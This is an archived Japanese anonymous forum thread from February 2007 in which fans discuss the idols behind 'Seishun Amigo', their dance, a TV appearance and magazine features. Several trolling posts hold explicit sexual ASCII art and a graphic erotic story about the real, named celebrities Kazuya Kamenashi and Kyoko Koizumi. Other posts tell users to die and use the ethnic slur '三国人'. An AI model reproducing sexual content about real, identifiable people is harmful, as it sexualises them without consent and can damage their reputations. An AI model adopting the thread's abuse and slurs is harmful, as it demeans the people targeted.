              ゙'-‐''゙''-‐''゙  
    パンパン
ズコバコ  ,ィヘ⌒ヽフ ←亀蟲
    / (  ゜ё`.)) -=3 <今日子のユルマン最高…ウッ
 ε//   し ヘ⌒ヽフ   アアン
  ( (  _,.ノ( *・ω・)) -=3 <イやン和くんのスケベ 
   し しー し─J さ ←今日子ちゃん

96 :ユー&名無しネ:2007/02/16(金) 03:12:04 ID:lffTQFkU
目のアミーゴは踊りも気持ち悪すぎた
誰が振り付けたんだよあんなの
帽子投げるところが失笑さそってた

97 :ユー&名無しネ:2007/02/16(金) 12:10:11 ID:4UpHXe+T
何で?あの踊りよかったと思うけど。
失笑さそってたって自分の感覚で決めつけんじゃねぇよ。

98 :ユー&名無しネ:2007/02/16(金) 12:15:41 ID:bbgObnTz
>97
ゴミ付き市ね

99 :ユー&名無しネ:2007/02/17(土) 04:15:41 ID:QV+H/gEI
>97
ゴミ付いてなくても死んでイイよ

100 :ユー&名無しネ:2007/02/17(土) 10:58:45 ID:cM0JkBH8
テラ怖いスレですね(゚Д゚)

101 :ユー&名無しネ:2007/02/17(土) 11:18:43 ID:CNL1yM4y
>100
全角死ね

102 :ユー&名無しネ:2007/02/17(土) 11:24:21 ID:X3KNfrbA
死ね死ね言ってるヤシがきもすぎる
可哀想な人だね(w


103 :ユー&名無しネ:2007/02/17(土) 12:13:46 ID:jJjWFFhV
モメサや荒らしは徹底スルー

104 :ユー&名無しネ:2007/02/17(土) 19:01:22 ID:UCJhhV3+
>102
オマエの最後の(wのが怖いよ…
もうみんなでシネシネ言うスレにしたらエエ

105 :ユー&名無しネ:2007/02/17(土) 22:15:29 ID:n8r8s2vr
Pアミーゴ歌ったよ

106 :ユー&名無しネ:2007/02/17(土) 22:51:16 ID:CqhSg+1E
>105
今日の紺で?
よければkwsk

107 :ユー&名無しネ:2007/02/18(日) 18:51:18 ID:PRHLfMGT
来月はPから目にメッセあるかな?

108 :ユー&名無しネ:2007/02/18(日) 19:58:40 ID:6FcujEmR
目様の老けっぷりは異常

109 :ユー&名無しネ:2007/02/18(日) 20:51:48 ID:Ad9Z5PXp
荒れてるな
プレミアムPとVTR目※見たが
アミーゴに関してはガイシュツの話だけだたな

110 :ユー&名無しネ:2007/02/18(日) 20:55:53 ID:Ad9Z5PXp
>107
$誌伝言板じゃなくてプレミアムのVTR※のことかな
少蔵サイトに予告出ればわかるがまだ出てないな
出るといいな

111 :ユー&名無しネ:2007/02/18(日) 23:44:17 ID:d5t/9T8E
プレミアム萌えた
目P担だと再確認した

112 :ユー&名無しネ:2007/02/19(月) 00:12:32 ID:3SS8bK0x
プレミアム観れた姐さん達テラ裏山

113 :ユー&名無しネ:2007/02/19(月) 14:22:40 ID:VX07z5UL
あの2人の仲が冷え切ってる事だけは分かった

114 :ユー&名無しネ:2007/02/19(月) 17:11:50 ID:TulkhSEN
>111
事務って一緒に言ってるのがモエスだた

115 :ユー&名無しネ:2007/02/19(月) 22:29:22 ID:3qMOIvWq
>113
ここからは諦めて同人ヲタにでもならない限り
2人には萌えられないのか?orz

116 :ユー&名無しネ:2007/02/20(火) 09:17:58 ID:0ZHz+JRc
>115
日本語でおk

117 :ユー&名無しネ:2007/02/20(火) 23:38:37 ID:q68nfRgf
Pは素直に内面を明かすが目は全く内面を明かそうとしないので
$誌※と一緒で温度差を感じたがまぁ誘ったりしてるのなら仲は悪くないのだろう


118 :ユー&名無しネ:2007/02/21(水) 12:45:33 ID:0d6J8Saw
>116
日本語が読めないオマエは三国人?

119 :ユー&名無しネ:2007/02/23(金) 08:17:28 ID:T9vCeyS6
       ★ 本日の亀蟲夫妻の営み ★

               ∧_∧
              ( ゜ё`.) -=3 <そろそろ始めようか今日子
             (,,う;;;;;;;;;;;;;;;;'(,,)  ←亀蟲 
             /,;;;'" ,,,,  !;;;)    ∧_∧<イやン和くんのスケベ
              ゙! (U) l、    ( ・ω・*)←今日子ちゃん 
              ゙'-‐''゙''-‐''゙  
    パンパン
ズコバコ  ,ィヘ⌒ヽフ ←亀蟲
    / (  ゜ё`.)) -=3 <今日子のユルマン最高…ウッ
 ε//   し ヘ⌒ヽフ   アアン
  ( (  _,.ノ( *・ω・)) -=3 <イやン和くんのスケベ 
   し しー し─J さ ←今日子ちゃん

120 :ユー&名無しネ:2007/02/23(金) 17:05:07 ID:keM+A+gX
今月の☆誌の「目Pが自分で選んだベスト3」で
二人で同じ2ショ写真選んでて和んだ

121 :ユー&名無しネ:2007/02/23(金) 21:05:40 ID:T9vCeyS6
★亀梨和也×小泉今日子★
亀梨「…今日子のココ‥‥すっげーやわらかくて入っちゃったのに…ナカはキツイなー」
小泉「解説なん、て‥‥いーからっ」
だからはやくちょうだい。…なんて、今日子の目が見上げてくる。いいんですか?遠慮なく食べちゃいますよ…子猫さん?
亀梨「…いくかんね」
今日子の腰をつかんで持ち上げ、ヌルつく蕾に固くそそり立った亀梨自身を押し付けると、誘うようにヒクつくそことひたすらに頷く今日子。
お言葉に甘えて、グプリと。一気に最奥まで腰を進めた。
小泉「は、ぁ‥ッ!」
亀梨「…っキツ…!」
入口はやわらかいくせに奥へ行くほどキツイ。抵抗してくる熱くやわらかい内壁に逆らって進むとありえないくらいにキモチイイ。
亀梨「今日子ちゃんったら、名器。」
小泉「そゆこと…ゆわないでバカっ!‥‥ぁ」
怒鳴った拍子にお腹に力が加わったらしく、しめつけてくる今日子ちゃん。
真っ赤に染まった相手を見たら、更に後孔を拡張するように自身が育ってしまう。
小泉「いぁッ‥かず、や」
亀梨「も‥‥ごめ、限界」
まだ入れたばかりなのに。まだまだ今日子のナカにいたいのに…。あまりにも、心地良すぎる。
亀梨「…いくよ」
折れてしまいそうな細い腰を抱え、大きく腰をグラインドさせる。
今日子の背が弓なりになれば細かくリズムを刻み、ふとした瞬間に腰を回転させてプクリと膨らんだ場所をえぐりあげて。
小泉「ひぁッあ、やぅ‥‥あぁッ!」
ここが外だなんて事も忘れてひたすらに。
今日子の喘ぎと濡れた水音。肌のぶつかりあう音が織り成す狂想曲。‥‥すべてが俺亀梨と今日子を狂わせる。
小泉「んんーッも、だめ‥かず、やァ…っ」
亀梨「ん、一緒…いこ?」
今日子の腕が俺の首筋にまわされ、コクコク頷いたのと同時に腰を後孔から抜けるほど引き、一気に奥へと叩き付ける。
ズコバコ  ,ィヘ⌒ヽフ  ブヒブヒ
    / (; ゜ё`.)) -=3   ←亀梨
 ε//   し ヘ⌒ヽフ   アアン
  ( (  _,.ノ( *・ω・)) -=3   ←今日子ちゃん
   し しー し─J さ
低視聴率にも関わらずセクロスしまくりの亀梨×今日子

33 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)